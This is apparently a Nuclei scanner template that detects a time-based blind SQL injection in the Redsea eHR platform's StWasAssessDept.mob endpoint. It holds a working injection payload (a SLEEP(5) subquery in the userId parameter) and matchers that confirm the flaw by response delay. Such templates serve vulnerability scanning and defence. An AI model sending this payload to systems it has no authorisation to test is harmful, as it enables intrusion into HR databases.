id: redsea-hrsoft-StWasAssessDept-sqli
info:
  name: 红海云eHR StWasAssessDept.mob 存在SQL注入
  author: leadlife
  severity: high
  description: 
  reference: 
    - https://vip.bdziyi.com/60389/
  classification:
    cve-id: 
  metadata:
    verified: true
    fofa-query: demo
    tips:
    repair:
    sqlmap:
    version:
  tags: sqli,redsea

http:
  - raw:  
      - |
        @timeout: 15s
        GET /RedseaPlatform/submitStWasAssessDept/StWasAssessDept.mob?userId='+AND+(SELECT+3266+FROM+(SELECT(SLEEP(5)))ShXk)+AND+'qmyT'='qmyT HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip
        Connection: keep-alive
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - duration >= 5 && duration < 9
        condition: and